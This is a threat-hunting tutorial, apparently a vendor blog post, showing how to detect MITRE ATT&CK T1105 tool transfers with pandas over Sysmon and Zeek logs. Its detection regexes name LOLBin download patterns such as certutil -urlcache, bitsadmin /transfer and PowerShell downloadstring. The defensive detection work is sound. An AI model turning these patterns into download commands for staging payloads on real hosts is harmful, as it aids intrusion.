After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.
This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.
Where T1105 Shows Up in Your Logs
Three sources cover most of it:
- Sysmon Event ID 1 (process creation) for the download command line and parent process
- Sysmon Event ID 3 (network connection) to confirm the process actually reached out
-
Zeek
http.log(or proxy logs) for the file coming across the wire
You can run all three as pandas DataFrames. No SIEM required, which matters when you are working an exported archive from a host you do not control.
Catching LOLBin Downloaders in the Command Line
Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns:
import pandas as pd
proc = pd.read_csv("sysmon_eid1.csv") # UtcTime, Image, CommandLine, ParentImage, ProcessGuid
# Download patterns by LOLBin (see the LOLBAS project)
patterns = {
"certutil": r"certutil.*(-urlcache|-f|-split).*http",
"bitsadmin": r"bitsadmin.*(/transfer|/addfile)",
"powershell": r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
"mshta": r"mshta.*http",
"curl_wget": r"\b(curl|wget)\b.*http",
}
cmd = proc["CommandLine"].fillna("").str.lower()
for name, rx in patterns.items():
proc[name] = cmd.str.contains(rx, regex=True, na=False)
suspect = proc[proc[list(patterns)].any(axis=1)]
This catches the noisy cases. It will also fire on legitimate admin activity, so the command line alone is a lead, not a verdict. The next two layers are what cut the false positives.
Beyond Signatures: Rare Process-to-Network Pairs
The stronger signal for T1105 is a process that does not normally talk to the internet suddenly making an external connection. Build a baseline from Sysmon Event ID 3 and flag the rare pairs:
import ipaddress
net = pd.read_csv("sysmon_eid3.csv") # Image, DestinationIp, DestinationPort, DestinationHostname
def is_external(ip):
try:
return not ipaddress.ip_address(ip).is_private
except ValueError:
return False
ext = net[net["DestinationIp"].map(is_external)].copy()
ext["proc"] = ext["Image"].str.lower()
# How often does each process talk externally across the whole environment?
freq = ext.groupby("proc")["DestinationIp"].count()
rare = freq[freq <= 3].index # processes that almost never egress
flagged = ext[ext["proc"].isin(rare)]
certutil.exe or notepad.exe opening an external connection lands in rare because, fleet-wide, those processes almost never egress. Tune the <= 3 threshold to your environment size. For a more principled version, score each (process, destination) pair by frequency and treat the long tail as the hunt queue, which is the same idea behind scikit-learn's rarity-based anomaly methods without the model overhead.
Catching the Payload on the Wire
Attackers rename payloads, so do not trust the file extension. Zeek records the actual response MIME type, which is what you want. Parse http.log and filter for executable content regardless of how the URL ends:
def load_zeek(path):
cols = None
with open(path) as f:
for line in f:
if line.startswith("#fields"):
cols = line.strip().split("\t")[1:]
break
return pd.read_csv(path, sep="\t", comment="#", names=cols,
na_values=["-", "(empty)"])
http = load_zeek("http.log") # ts, host, uri, method, resp_mime_types, user_agent
exe_mimes = ["application/x-dosexec", "application/x-msdownload", "application/octet-stream"]
downloads = http[http["resp_mime_types"].fillna("").str.contains("|".join(exe_mimes), regex=True)]
# A .jpg URL that returns a PE file is a strong T1105 lead
downloads["ext"] = downloads["uri"].str.extract(r"\.([a-z0-9]{1,5})(?:\?|$)", expand=False)
mismatched = downloads[~downloads["ext"].isin(["exe", "dll", "msi", None])]
A URI ending in .jpg that returns application/x-dosexec is the kind of mismatch that almost never has a benign explanation. Pair it with the rare-egress process list above and you have high-confidence T1105 without a single static signature.
Putting It Together
The three layers reinforce each other. The command-line patterns give you candidate processes, the rare process-to-network baseline tells you which ones are abnormal, and the wire data confirms an executable actually moved. A finding that lights up all three is worth waking someone for. One layer alone is a lead to triage.
This is the workflow we teach in GTK Cyber's Threat Hunting with Data Science course: building detections from log data and statistics rather than waiting for a vendor signature. If you want the full reference on the technique itself, the T1105 page has the ATT&CK detail and related techniques, and the threat hunting pipeline post shows how to wire these queries into something repeatable.
Top comments (0)